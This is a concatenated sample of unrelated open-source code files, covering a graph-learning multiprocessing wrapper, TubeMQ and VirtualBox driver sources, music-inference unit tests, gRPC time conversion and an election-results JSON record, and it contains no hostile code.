parser.add_argument('-r', '--resamples', type=int, required=False,
default=100,
help='Number of bootstrap resamples for Sobol '
'confidence intervals')
return parser
def cli_action(args):
problem = read_param_file(args.paramfile)
X = np.loadtxt(args.model_input_file,
delimiter=args.delimiter)
Y = np.loadtxt(args.model_output_file,
delimiter=args.delimiter,
usecols=(args.column,))
analyze(problem, X, Y, M=args.M, num_resamples=args.resamples, print_to_console=True, seed=args.seed)
if __name__ == "__main__":
common_args.run_cli(cli_parse, cli_action)
| 2,531 |
9,516 |
<filename>python/dgl/multiprocessing/__init__.py
"""Wrapper of the multiprocessing module for multi-GPU training."""
# To avoid duplicating the graph structure for node classification or link prediction
# training we recommend using fork() rather than spawn() for multiple GPU training.
# However, we need to work around https://github.com/pytorch/pytorch/issues/17199 to
# make fork() and openmp work together.
from .. import backend as F
if F.get_preferred_backend() == 'pytorch':
# Wrap around torch.multiprocessing...
from torch.multiprocessing import *
# ... and override the Process initializer
from .pytorch import Process
else:
# Just import multiprocessing module.
from multiprocessing import * # pylint: disable=redefined-builtin
| 237 |
348 |
{"nom":"Airon-Notre-Dame","circ":"4ème circonscription","dpt":"Pas-de-Calais","inscrits":175,"abs":59,"votants":116,"blancs":2,"nuls":8,"exp":106,"res":[{"nuance":"REM","nom":"<NAME>","voix":55},{"nuance":"LR","nom":"<NAME>","voix":51}]}
| 99 |
921 |
// Copyright (c) 2015-2020 <NAME> <<EMAIL>> Use of this source code is governed by the Apache 2.0 license that can be found in the LICENSE file.
package com.vladsch.md.nav.testUtil;
import com.vladsch.flexmark.util.data.DataHolder;
import com.vladsch.md.nav.testUtil.cases.MdEnhCodeInsightFixtureSpecTestCase;
import com.vladsch.plugin.test.util.cases.CodeInsightFixtureSpecTestCase;
import org.jetbrains.annotations.Nullable;
import java.util.HashMap;
import java.util.Map;
public abstract class MdEnhLightPlatformCodeInsightFixtureSpecTestCase extends MdLightPlatformCodeInsightFixtureSpecTestCase implements MdEnhCodeInsightFixtureSpecTestCase {
final private static Map<String, DataHolder> optionsMap = new HashMap<>();
static {
optionsMap.putAll(MdEnhCodeInsightFixtureSpecTestCase.getOptionsMap());
}
public MdEnhLightPlatformCodeInsightFixtureSpecTestCase(@Nullable Map<String, ? extends DataHolder> optionMap, @Nullable DataHolder... defaultOptions) {
super(CodeInsightFixtureSpecTestCase.optionsMaps(optionsMap, optionMap), defaultOptions);
}
}
| 353 |
497 |
{
"type": "industrial",
"width": 3,
"height": 3,
"name": "metal_fabricator",
"sprite": "metal_fabricator.svg",
"description": "Metal Fabricator",
"level": 2,
"power_required": 3,
"pollution": 2,
"production": {
"consumes": {
"labor": 3
},
"produces": {
"wholesale_goods": 8
}
}
}
| 150 |
975 |
package com.dianping.agentsdk.framework;
/**
* Created by hezhi on 16/8/3.
*/
public interface ItemIdInterface {
long getItemId(int section, int position);
}
| 56 |
315 |
/**
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.inlong.tubemq.server.master.bdbstore.bdbentitys;
import com.sleepycat.persist.model.Entity;
import com.sleepycat.persist.model.PrimaryKey;
import java.io.Serializable;
import java.util.Date;
import org.apache.commons.lang.builder.ToStringBuilder;
import org.apache.inlong.tubemq.corebase.TBaseConstants;
import org.apache.inlong.tubemq.corebase.utils.TStringUtils;
import org.apache.inlong.tubemq.server.common.TServerConstants;
import org.apache.inlong.tubemq.server.common.statusdef.EnableStatus;
import org.apache.inlong.tubemq.server.common.utils.WebParameterUtils;
import org.apache.inlong.tubemq.server.master.metamanage.metastore.TStoreConstants;
@Entity
public class BdbGroupFlowCtrlEntity implements Serializable {
private static final long serialVersionUID = 2533735122504168321L;
@PrimaryKey
private String groupName; //group name
private long serialId = -1L; //serial id
private int statusId = -1; // 0:not active; 1: active
private String flowCtrlInfo;
private int ruleCnt = 0; //flow control rule count
private long ssdTranslateId = System.currentTimeMillis();
private boolean needSSDProc = false; //ssd
private String attributes; //extra attributes
// ** Based on the data compatibility consideration of the original version:
// the creation information in this example is the last modified information,
// and the modified information is the creation information
private String createUser; //create user
private Date createDate; //create date
public BdbGroupFlowCtrlEntity() {
}
//Constructor
public BdbGroupFlowCtrlEntity(final String flowCtrlInfo, final int statusId,
final int ruleCnt, final int qryPriorityId,
final String attributes, final boolean curNeedSSDProc,
final String modifyUser, final Date modifyDate) {
this.statusId = statusId;
this.groupName = TServerConstants.TOKEN_DEFAULT_FLOW_CONTROL;
this.serialId = System.currentTimeMillis();
this.flowCtrlInfo = flowCtrlInfo;
this.attributes = attributes;
this.ruleCnt = ruleCnt;
this.ssdTranslateId = System.currentTimeMillis();
this.needSSDProc = curNeedSSDProc;
this.createUser = modifyUser;
this.createDate = modifyDate;
this.setQryPriorityId(qryPriorityId);
}
//Constructor
public BdbGroupFlowCtrlEntity(final String groupName, final String flowCtrlInfo,
final int statusId, final int ruleCnt,
final int qryPriorityId, final String attributes,
final boolean needSSDProc, final String modifyUser,
final Date modifyDate) {
this.groupName = groupName;
this.serialId = System.currentTimeMillis();
this.statusId = statusId;
this.flowCtrlInfo = flowCtrlInfo;
this.attributes = attributes;
this.ruleCnt = ruleCnt;
this.createUser = modifyUser;
this.createDate = modifyDate;
this.needSSDProc = needSSDProc;
this.ssdTranslateId = TBaseConstants.META_VALUE_UNDEFINED;
this.setQryPriorityId(qryPriorityId);
}
//Constructor
public BdbGroupFlowCtrlEntity(final String groupName, final String flowCtrlInfo,
final int statusId, final int ruleCnt,
final String attributes, final long ssdTranslateId,
final boolean needSSDProc, final String modifyUser,
final Date modifyDate) {
this.groupName = groupName;
this.serialId = System.currentTimeMillis();
this.statusId = statusId;
this.flowCtrlInfo = flowCtrlInfo;
this.attributes = attributes;
this.ruleCnt = ruleCnt;
this.createUser = modifyUser;
this.createDate = modifyDate;
this.needSSDProc = needSSDProc;
this.ssdTranslateId = ssdTranslateId;
}
//Constructor
public BdbGroupFlowCtrlEntity(long serialId, String groupName, String flowCtrlInfo,
int statusId, int ruleCnt, int qryPriorityId,
String attributes, String modifyUser,
Date modifyDate) {
this.groupName = groupName;
this.serialId = serialId;
this.statusId = statusId;
this.flowCtrlInfo = flowCtrlInfo;
this.attributes = attributes;
this.ruleCnt = ruleCnt;
this.createUser = modifyUser;
this.createDate = modifyDate;
this.needSSDProc = false;
this.ssdTranslateId = TBaseConstants.META_VALUE_UNDEFINED;
this.setQryPriorityId(qryPriorityId);
}
public long getSsdTranslateId() {
return ssdTranslateId;
}
public int getRuleCnt() {
return ruleCnt;
}
public void setRuleCnt(int ruleCnt) {
this.ruleCnt = ruleCnt;
}
public long getSerialId() {
return serialId;
}
public String getGroupName() {
return groupName;
}
public void setGroupName(String groupName) {
this.groupName = groupName;
}
public String getAttributes() {
return attributes;
}
public void setAttributes(String attributes) {
this.attributes = attributes;
}
public String getModifyUser() {
return createUser;
}
public boolean isNeedSSDProc() {
return needSSDProc;
}
public void setNeedSSDProc(boolean needSSDProc) {
this.needSSDProc = needSSDProc;
}
public Date getModifyDate() {
return createDate;
}
public String getFlowCtrlInfo() {
return flowCtrlInfo;
}
public void setFlowCtrlInfo(int ruleCnt, String flowCtrlInfo) {
this.ruleCnt = ruleCnt;
this.flowCtrlInfo = flowCtrlInfo;
this.serialId = System.currentTimeMillis();
}
public int getStatusId() {
return statusId;
}
public void setStatusId(int statusId) {
this.statusId = statusId;
this.serialId = System.currentTimeMillis();
}
public boolean isValidStatus() {
return (statusId != 0);
}
public int getQryPriorityId() {
String atrVal =
TStringUtils.getAttrValFrmAttributes(this.attributes,
TStoreConstants.TOKEN_QRY_PRIORITY_ID);
if (atrVal != null) {
return Integer.parseInt(atrVal);
}
return 0;
}
public void setQryPriorityId(int qryPriorityId) {
this.attributes =
TStringUtils.setAttrValToAttributes(this.attributes,
TStoreConstants.TOKEN_QRY_PRIORITY_ID,
String.valueOf(qryPriorityId));
}
public EnableStatus getResCheckStatus() {
String atrVal =
TStringUtils.getAttrValFrmAttributes(this.attributes,
TStoreConstants.TOKEN_RES_CHECK_STATUS);
if (atrVal != null) {
return EnableStatus.valueOf(Integer.parseInt(atrVal));
}
return EnableStatus.STATUS_UNDEFINE;
}
public void setResCheckStatus(EnableStatus resCheckStatus) {
this.attributes =
TStringUtils.setAttrValToAttributes(this.attributes,
TStoreConstants.TOKEN_RES_CHECK_STATUS,
String.valueOf(resCheckStatus.getCode()));
}
public int getAllowedBrokerClientRate() {
String atrVal =
TStringUtils.getAttrValFrmAttributes(this.attributes,
TStoreConstants.TOKEN_BROKER_CLIENT_RATE);
if (atrVal != null) {
return Integer.parseInt(atrVal);
}
return TBaseConstants.META_VALUE_UNDEFINED;
}
public void setAllowedBrokerClientRate(int allowedBrokerClientRate) {
this.attributes =
TStringUtils.setAttrValToAttributes(this.attributes,
TStoreConstants.TOKEN_BROKER_CLIENT_RATE,
String.valueOf(allowedBrokerClientRate));
}
public void setCreateInfo(String createUser, Date createDate) {
if (TStringUtils.isNotBlank(createUser)) {
this.attributes =
TStringUtils.setAttrValToAttributes(this.attributes,
TStoreConstants.TOKEN_CREATE_USER, createUser);
}
if (createDate != null) {
String dataStr = WebParameterUtils.date2yyyyMMddHHmmss(createDate);
this.attributes =
TStringUtils.setAttrValToAttributes(this.attributes,
TStoreConstants.TOKEN_CREATE_DATE, dataStr);
}
}
public String getCreateUser() {
return TStringUtils.getAttrValFrmAttributes(
this.attributes, TStoreConstants.TOKEN_CREATE_USER);
}
public Date getCreateDate() {
String dateStr = TStringUtils.getAttrValFrmAttributes(
this.attributes, TStoreConstants.TOKEN_CREATE_DATE);
return WebParameterUtils.yyyyMMddHHmmss2date(dateStr);
}
public String getStrModifyDate() {
return WebParameterUtils.date2yyyyMMddHHmmss(createDate);
}
public String getStrCreateDate() {
return TStringUtils.getAttrValFrmAttributes(
this.attributes, TStoreConstants.TOKEN_CREATE_DATE);
}
@Override
public String toString() {
return new ToStringBuilder(this)
.append("groupName", groupName)
.append("serialId", serialId)
.append("statusId", statusId)
.append("flowCtrlInfo", ".....")
.append("ruleCnt", ruleCnt)
.append("ssdTranslateId", ssdTranslateId)
.append("needSSDProc", needSSDProc)
.append("attributes", attributes)
.append("createUser", getCreateUser())
.append("createDate", getCreateUser())
.append("modifyUser", createUser)
.append("modifyDate", getStrModifyDate())
.toString();
}
/**
* Serialize config field to json format
*
* @param sBuilder
* @return
*/
public StringBuilder toJsonString(final StringBuilder sBuilder) {
return sBuilder.append("{\"type\":\"BdbGroupFlowCtrlEntity\",")
.append("\"groupName\":\"").append(groupName)
.append("\",\"statusId\":").append(statusId)
.append(",\"ssdTranslateId\":").append(ssdTranslateId)
.append(",\"ruleCnt\":").append(ruleCnt)
.append(",\"needSSDProc\":").append(needSSDProc)
.append(",\"serialId\":").append(serialId)
.append(",\"qryPriorityId\":").append(getQryPriorityId())
.append(",\"flowCtrlInfo\":").append(flowCtrlInfo)
.append(", \"attributes\":\"").append(attributes)
.append(",\"createUser\":\"").append(getCreateUser())
.append("\",\"createDate\":\"").append(getStrCreateDate())
.append("\",\"modifyUser\":\"").append(createUser)
.append("\",\"modifyDate\":\"").append(getStrModifyDate())
.append("\"}");
}
}
| 5,471 |
521 |
<filename>third_party/virtualbox/src/VBox/Additions/WINNT/Graphics/Video/disp/wddm/VBoxUhgsmiDisp.cpp
/* $Id: VBoxUhgsmiDisp.cpp $ */
/** @file
* VBoxVideo Display D3D User mode dll
*/
/*
* Copyright (C) 2011-2017 Oracle Corporation
*
* This file is part of VirtualBox Open Source Edition (OSE), as
* available from http://www.virtualbox.org. This file is free software;
* you can redistribute it and/or modify it under the terms of the GNU
* General Public License (GPL) as published by the Free Software
* Foundation, in version 2 as it comes in the "COPYING" file of the
* VirtualBox OSE distribution. VirtualBox OSE is distributed in the
* hope that it will be useful, but WITHOUT ANY WARRANTY of any kind.
*/
#include "VBoxDispD3DCmn.h"
#define VBOXUHGSMID3D_GET_PRIVATE(_p, _t) ((_t*)(((uint8_t*)_p) - RT_OFFSETOF(_t, BasePrivate.Base)))
#define VBOXUHGSMID3D_GET(_p) VBOXUHGSMID3D_GET_PRIVATE(_p, VBOXUHGSMI_PRIVATE_D3D)
#include <iprt/mem.h>
#include <iprt/err.h>
DECLCALLBACK(int) vboxUhgsmiD3DBufferDestroy(PVBOXUHGSMI_BUFFER pBuf)
{
PVBOXUHGSMI_BUFFER_PRIVATE_DX_ALLOC_BASE pBuffer = VBOXUHGSMDXALLOCBASE_GET_BUFFER(pBuf);
struct VBOXWDDMDISP_DEVICE *pDevice = VBOXUHGSMID3D_GET(pBuffer->BasePrivate.pHgsmi)->pDevice;
D3DDDICB_DEALLOCATE DdiDealloc;
DdiDealloc.hResource = 0;
DdiDealloc.NumAllocations = 1;
DdiDealloc.HandleList = &pBuffer->hAllocation;
HRESULT hr = pDevice->RtCallbacks.pfnDeallocateCb(pDevice->hDevice, &DdiDealloc);
if (hr == S_OK)
{
#ifdef DEBUG_misha
memset(pBuffer, 0, sizeof (*pBuffer));
#endif
RTMemFree(pBuffer);
return VINF_SUCCESS;
}
WARN(("pfnDeallocateCb failed, hr %#x", hr));
return VERR_GENERAL_FAILURE;
}
/* typedef DECLCALLBACK(int) FNVBOXUHGSMI_BUFFER_LOCK(PVBOXUHGSMI_BUFFER pBuf, uint32_t offLock, uint32_t cbLock, VBOXUHGSMI_BUFFER_LOCK_FLAGS fFlags, void**pvLock); */
DECLCALLBACK(int) vboxUhgsmiD3DBufferLock(PVBOXUHGSMI_BUFFER pBuf, uint32_t offLock, uint32_t cbLock, VBOXUHGSMI_BUFFER_LOCK_FLAGS fFlags, void**pvLock)
{
PVBOXUHGSMI_BUFFER_PRIVATE_DX_ALLOC_BASE pBuffer = VBOXUHGSMDXALLOCBASE_GET_BUFFER(pBuf);
struct VBOXWDDMDISP_DEVICE *pDevice = VBOXUHGSMID3D_GET(pBuffer->BasePrivate.pHgsmi)->pDevice;
D3DDDICB_LOCK DdiLock = {0};
DdiLock.hAllocation = pBuffer->hAllocation;
DdiLock.PrivateDriverData = 0;
int rc = vboxUhgsmiBaseDxLockData(pBuffer, offLock, cbLock, fFlags,
&DdiLock.Flags, &DdiLock.NumPages);
if (!RT_SUCCESS(rc))
{
WARN(("vboxUhgsmiBaseDxLockData failed rc %d", rc));
return rc;
}
if (DdiLock.NumPages)
DdiLock.pPages = pBuffer->aLockPageIndices;
else
DdiLock.pPages = NULL;
HRESULT hr = pDevice->RtCallbacks.pfnLockCb(pDevice->hDevice, &DdiLock);
if (hr == S_OK)
{
*pvLock = (void*)(((uint8_t*)DdiLock.pData) + (offLock & 0xfff));
return VINF_SUCCESS;
}
WARN(("pfnLockCb failed, hr %#x", hr));
return VERR_GENERAL_FAILURE;
}
DECLCALLBACK(int) vboxUhgsmiD3DBufferUnlock(PVBOXUHGSMI_BUFFER pBuf)
{
PVBOXUHGSMI_BUFFER_PRIVATE_DX_ALLOC_BASE pBuffer = VBOXUHGSMDXALLOCBASE_GET_BUFFER(pBuf);
struct VBOXWDDMDISP_DEVICE *pDevice = VBOXUHGSMID3D_GET(pBuffer->BasePrivate.pHgsmi)->pDevice;
D3DDDICB_UNLOCK DdiUnlock;
DdiUnlock.NumAllocations = 1;
DdiUnlock.phAllocations = &pBuffer->hAllocation;
HRESULT hr = pDevice->RtCallbacks.pfnUnlockCb(pDevice->hDevice, &DdiUnlock);
if (hr == S_OK)
return VINF_SUCCESS;
WARN(("pfnUnlockCb failed, hr %#x", hr));
return VERR_GENERAL_FAILURE;
}
/*typedef DECLCALLBACK(int) FNVBOXUHGSMI_BUFFER_CREATE(PVBOXUHGSMI pHgsmi, uint32_t cbBuf, VBOXUHGSMI_BUFFER_TYPE_FLAGS fType, PVBOXUHGSMI_BUFFER* ppBuf);*/
DECLCALLBACK(int) vboxUhgsmiD3DBufferCreate(PVBOXUHGSMI pHgsmi, uint32_t cbBuf, VBOXUHGSMI_BUFFER_TYPE_FLAGS fType, PVBOXUHGSMI_BUFFER* ppBuf)
{
if (!cbBuf)
return VERR_INVALID_PARAMETER;
int rc = VINF_SUCCESS;
cbBuf = VBOXWDDM_ROUNDBOUND(cbBuf, 0x1000);
Assert(cbBuf);
uint32_t cPages = cbBuf >> 12;
Assert(cPages);
PVBOXUHGSMI_PRIVATE_D3D pPrivate = VBOXUHGSMID3D_GET(pHgsmi);
PVBOXUHGSMI_BUFFER_PRIVATE_DX_ALLOC_BASE pBuf;
pBuf = (PVBOXUHGSMI_BUFFER_PRIVATE_DX_ALLOC_BASE)RTMemAllocZ(RT_UOFFSETOF_DYN(VBOXUHGSMI_BUFFER_PRIVATE_DX_ALLOC_BASE,
aLockPageIndices[cPages]));
if (pBuf)
{
D3DDDICB_ALLOCATE DdiAlloc;
D3DDDI_ALLOCATIONINFO DdiAllocInfo;
VBOXWDDM_ALLOCINFO AllocInfo;
memset(&DdiAlloc, 0, sizeof (DdiAlloc));
DdiAlloc.hResource = NULL;
DdiAlloc.hKMResource = NULL;
DdiAlloc.NumAllocations = 1;
DdiAlloc.pAllocationInfo = &DdiAllocInfo;
vboxUhgsmiBaseDxAllocInfoFill(&DdiAllocInfo, &AllocInfo, cbBuf, fType);
HRESULT hr = pPrivate->pDevice->RtCallbacks.pfnAllocateCb(pPrivate->pDevice->hDevice, &DdiAlloc);
if (hr == S_OK)
{
Assert(DdiAllocInfo.hAllocation);
pBuf->BasePrivate.Base.pfnLock = vboxUhgsmiD3DBufferLock;
pBuf->BasePrivate.Base.pfnUnlock = vboxUhgsmiD3DBufferUnlock;
pBuf->BasePrivate.Base.pfnDestroy = vboxUhgsmiD3DBufferDestroy;
pBuf->BasePrivate.Base.fType = fType;
pBuf->BasePrivate.Base.cbBuffer = cbBuf;
pBuf->BasePrivate.pHgsmi = &pPrivate->BasePrivate;
pBuf->hAllocation = DdiAllocInfo.hAllocation;
*ppBuf = &pBuf->BasePrivate.Base;
return VINF_SUCCESS;
}
else
{
WARN(("pfnAllocateCb failed hr %#x"));
rc = VERR_GENERAL_FAILURE;
}
RTMemFree(pBuf);
}
else
{
WARN(("RTMemAllocZ failed"));
rc = VERR_NO_MEMORY;
}
return rc;
}
/* typedef DECLCALLBACK(int) FNVBOXUHGSMI_BUFFER_SUBMIT(PVBOXUHGSMI pHgsmi, PVBOXUHGSMI_BUFFER_SUBMIT aBuffers, uint32_t cBuffers); */
DECLCALLBACK(int) vboxUhgsmiD3DBufferSubmit(PVBOXUHGSMI pHgsmi, PVBOXUHGSMI_BUFFER_SUBMIT aBuffers, uint32_t cBuffers)
{
PVBOXUHGSMI_PRIVATE_D3D pHg = VBOXUHGSMID3D_GET(pHgsmi);
PVBOXWDDMDISP_DEVICE pDevice = pHg->pDevice;
UINT cbDmaCmd = pDevice->DefaultContext.ContextInfo.CommandBufferSize;
int rc = vboxUhgsmiBaseDxDmaFill(aBuffers, cBuffers,
pDevice->DefaultContext.ContextInfo.pCommandBuffer, &cbDmaCmd,
pDevice->DefaultContext.ContextInfo.pAllocationList, pDevice->DefaultContext.ContextInfo.AllocationListSize,
pDevice->DefaultContext.ContextInfo.pPatchLocationList, pDevice->DefaultContext.ContextInfo.PatchLocationListSize);
if (RT_FAILURE(rc))
{
WARN(("vboxUhgsmiBaseDxDmaFill failed, rc %d", rc));
return rc;
}
D3DDDICB_RENDER DdiRender = {0};
DdiRender.CommandLength = cbDmaCmd;
Assert(DdiRender.CommandLength);
Assert(DdiRender.CommandLength < UINT32_MAX/2);
DdiRender.CommandOffset = 0;
DdiRender.NumAllocations = cBuffers;
DdiRender.NumPatchLocations = 0;
// DdiRender.NewCommandBufferSize = sizeof (VBOXVDMACMD) + 4 * (100);
// DdiRender.NewAllocationListSize = 100;
// DdiRender.NewPatchLocationListSize = 100;
DdiRender.hContext = pDevice->DefaultContext.ContextInfo.hContext;
HRESULT hr = pDevice->RtCallbacks.pfnRenderCb(pDevice->hDevice, &DdiRender);
if (hr == S_OK)
{
pDevice->DefaultContext.ContextInfo.CommandBufferSize = DdiRender.NewCommandBufferSize;
pDevice->DefaultContext.ContextInfo.pCommandBuffer = DdiRender.pNewCommandBuffer;
pDevice->DefaultContext.ContextInfo.AllocationListSize = DdiRender.NewAllocationListSize;
pDevice->DefaultContext.ContextInfo.pAllocationList = DdiRender.pNewAllocationList;
pDevice->DefaultContext.ContextInfo.PatchLocationListSize = DdiRender.NewPatchLocationListSize;
pDevice->DefaultContext.ContextInfo.pPatchLocationList = DdiRender.pNewPatchLocationList;
return VINF_SUCCESS;
}
WARN(("pfnRenderCb failed, hr %#x", hr));
return VERR_GENERAL_FAILURE;
}
static DECLCALLBACK(int) vboxCrHhgsmiDispEscape(struct VBOXUHGSMI_PRIVATE_BASE *pHgsmi, void *pvData, uint32_t cbData, BOOL fHwAccess)
{
PVBOXUHGSMI_PRIVATE_D3D pPrivate = VBOXUHGSMID3D_GET(pHgsmi);
PVBOXWDDMDISP_DEVICE pDevice = pPrivate->pDevice;
D3DDDICB_ESCAPE DdiEscape = {0};
DdiEscape.hContext = pDevice->DefaultContext.ContextInfo.hContext;
DdiEscape.hDevice = pDevice->hDevice;
DdiEscape.Flags.HardwareAccess = !!fHwAccess;
DdiEscape.pPrivateDriverData = pvData;
DdiEscape.PrivateDriverDataSize = cbData;
HRESULT hr = pDevice->RtCallbacks.pfnEscapeCb(pDevice->pAdapter->hAdapter, &DdiEscape);
if (SUCCEEDED(hr))
{
return VINF_SUCCESS;
}
WARN(("pfnEscapeCb failed, hr 0x%x", hr));
return VERR_GENERAL_FAILURE;
}
void vboxUhgsmiD3DInit(PVBOXUHGSMI_PRIVATE_D3D pHgsmi, PVBOXWDDMDISP_DEVICE pDevice)
{
pHgsmi->BasePrivate.Base.pfnBufferCreate = vboxUhgsmiD3DBufferCreate;
pHgsmi->BasePrivate.Base.pfnBufferSubmit = vboxUhgsmiD3DBufferSubmit;
/* escape is still needed, since Ugfsmi uses it e.g. to query connection id */
pHgsmi->BasePrivate.pfnEscape = vboxCrHhgsmiDispEscape;
pHgsmi->pDevice = pDevice;
}
void vboxUhgsmiD3DEscInit(PVBOXUHGSMI_PRIVATE_D3D pHgsmi, struct VBOXWDDMDISP_DEVICE *pDevice)
{
vboxUhgsmiBaseInit(&pHgsmi->BasePrivate, vboxCrHhgsmiDispEscape);
pHgsmi->pDevice = pDevice;
}
| 4,526 |
1,145 |
import numpy as np
from omnizart.music import inference as inf
def generate_pred(frame_size, on_pitch, scale=4, occur_num=3):
pred = np.zeros((frame_size, 88*scale))
for idx, pitch in enumerate(on_pitch):
pitch_range = range(pitch*scale, (pitch+1)*scale)
occur_pos = np.random.choice(pitch_range, size=occur_num, replace=False)
pred[idx, occur_pos] = 1
return pred
def validate_down_sample(out, on_pitch):
for idx, frm in enumerate(out):
occur_idx = np.where(frm>0)[0][0]
assert occur_idx == on_pitch[idx]
def test_roll_down_sample():
bar = np.array([
[1, 1, 0, 0, 0, 1, 1, 0.6, 0.4, 0.1, 0, 0],
[1, 1, 0.5, 0, 0, 0.8, 1, 0.6, 0.2, 0.1, 0, 0.5],
[1, 1, 0.2, 0, 0, 0.7, 0, 0.6, 0.3, 0.1, 0, 0.1],
[1, 0, 0, 0, 0.1, 0.9, 0, 0.6, 0.2, 0.1, 0, 0.2]
]).T
expected_bar = np.array([1, 0.75, 0.175, 0, 0.025, 0.85, 0.5, 0.6, 0.275, 0.1, 0, 0.2])
data = np.zeros((200, 352))
data[:12, :4] = bar
data[50:62, 40:44] = bar
out = inf.roll_down_sample(data)
assert out.shape == (200, 88)
assert np.array_equal(out[:12, 0], expected_bar)
assert np.array_equal(out[50:62, 10], expected_bar)
def test_down_sample():
frame_size = 300
channels = 10
preds = []
on_pitches = []
for _ in range(channels):
on_pitch = np.random.randint(88, size=frame_size)
pred = generate_pred(frame_size, on_pitch)
on_pitches.append(on_pitch)
preds.append(pred)
preds = np.dstack(preds)
outs = inf.down_sample(preds)
assert outs.shape == (frame_size, 88, channels)
for idx in range(channels):
validate_down_sample(outs[:,:,idx], on_pitches[idx])
def test_find_occur():
data = np.array([1, 1, 0, 0, 0, 1, 0, 1, 1, 1, 1, 1, 0, 1, 1, 1])
expected = [{"onset": 0, "offset": 1}, {"onset": 7, "offset": 11}, {"onset": 13, "offset": 15}]
out = inf.find_occur(data)
assert out == expected
out = inf.find_occur(data, min_duration=0.01)
assert out == expected
out = inf.find_occur(data, t_unit=0.01)
assert out == [{"onset": 7, "offset": 11}, {"onset": 13, "offset": 15}]
out = inf.find_occur(data, min_duration=0.07)
assert out == [{"onset": 7, "offset": 11}]
assert inf.find_occur(np.array([0, 0, 0])) == []
def test_find_min_max_stren():
stren = np.random.random(500)
max_v, min_v = np.max(stren), np.min(stren)
notes = [{"stren": stv} for stv in stren]
assert inf.find_min_max_stren(notes) == (min_v, max_v)
assert inf.find_min_max_stren([]) == (0.5, 0.5)
def test_infer_pitch():
zeros = np.zeros(50)
onset = np.array([
0, 2.5, 3.1, 3, 3, 2.8, 2, 3.3, 3, 2.9, 2.8, 2.8, 1, 0, # Two peaks, but filter-out the first one due to distance too close
0, 0, 2, 2.6, 3, 3, 3.1, 3, 1.2, 1.4, 0, 0, 0, 0, # One peak
0.3, 0.2, 0, 0.1, 0, 0, 2.3, 2.4, 2.5, 2.6, 2.2, 2, # One peak, will be eliminated due to duration too short
0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0
])
dura = np.array([
0, 0, 0.5, 0.8, 1.8, 2, 2, 0.6, 1.5, 1.3, 1.4, 1.9, 2.5, 2.6,
0, 0, 0, 0, 0, 0.2, 0.3, 0.8, 1.2, 1.4, 1.8, 2, 2, 1,
0.8, 0.4, 0, 0, 0, 0, 0, 0, 0, 0.1, 0.3, 0.8, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0
])
expected = [
{"start": 7, "end": 20, "stren": 3.3},
{"start": 20, "end": 30, "stren": 3.1}
]
pitch = np.stack([zeros, dura, onset], axis=1)
out = inf.infer_pitch(pitch)
assert out == expected
assert inf.infer_pitch(pitch, shortest=30) == []
pitch[:, 2] = 0
assert inf.infer_pitch(pitch) == []
| 1,860 |
348 |
{"nom":"Garindein","circ":"4ème circonscription","dpt":"Pyrénées-Atlantiques","inscrits":410,"abs":185,"votants":225,"blancs":13,"nuls":16,"exp":196,"res":[{"nuance":"DVD","nom":"<NAME>","voix":121},{"nuance":"REM","nom":"<NAME>","voix":75}]}
| 96 |
511 |
/*
*
* Copyright 2015 gRPC authors.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*
*/
#include <grpc++/support/config.h>
#include <grpc++/support/time.h>
#include <grpc/support/time.h>
using std::chrono::duration_cast;
using std::chrono::high_resolution_clock;
using std::chrono::nanoseconds;
using std::chrono::seconds;
using std::chrono::system_clock;
namespace grpc {
void Timepoint2Timespec(const system_clock::time_point& from,
gpr_timespec* to) {
system_clock::duration deadline = from.time_since_epoch();
seconds secs = duration_cast<seconds>(deadline);
if (from == system_clock::time_point::max() ||
secs.count() >= gpr_inf_future(GPR_CLOCK_REALTIME).tv_sec ||
secs.count() < 0) {
*to = gpr_inf_future(GPR_CLOCK_REALTIME);
return;
}
nanoseconds nsecs = duration_cast<nanoseconds>(deadline - secs);
to->tv_sec = (int64_t)secs.count();
to->tv_nsec = (int32_t)nsecs.count();
to->clock_type = GPR_CLOCK_REALTIME;
}
void TimepointHR2Timespec(const high_resolution_clock::time_point& from,
gpr_timespec* to) {
high_resolution_clock::duration deadline = from.time_since_epoch();
seconds secs = duration_cast<seconds>(deadline);
if (from == high_resolution_clock::time_point::max() ||
secs.count() >= gpr_inf_future(GPR_CLOCK_REALTIME).tv_sec ||
secs.count() < 0) {
*to = gpr_inf_future(GPR_CLOCK_REALTIME);
return;
}
nanoseconds nsecs = duration_cast<nanoseconds>(deadline - secs);
to->tv_sec = (int64_t)secs.count();
to->tv_nsec = (int32_t)nsecs.count();
to->clock_type = GPR_CLOCK_REALTIME;
}
system_clock::time_point Timespec2Timepoint(gpr_timespec t) {
if (gpr_time_cmp(t, gpr_inf_future(t.clock_type)) == 0) {
return system_clock::time_point::max();
}
t = gpr_convert_clock_type(t, GPR_CLOCK_REALTIME);
system_clock::time_point tp;
tp += duration_cast<system_clock::time_point::duration>(seconds(t.tv_sec));
tp +=
duration_cast<system_clock::time_point::duration>(nanoseconds(t.tv_nsec));
return tp;
}
} // namespace grpc
| 1,001 |
2,206 |
/*
* ******************************************************************************
* *
* *
* * This program and the accompanying materials are made available under the
* * terms of the Apache License, Version 2.0 which is available at
* * https://www.apache.org/licenses/LICENSE-2.0.
* *
* * See the NOTICE file distributed with this work for additional
* * information regarding copyright ownership.
* * Unless required by applicable law or agreed to in writing, software
* * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* * License for the specific language governing permissions and limitations
* * under the License.
* *
* * SPDX-License-Identifier: Apache-2.0
* *****************************************************************************
*/
package org.deeplearning4j.nn.modelimport.keras.layers;
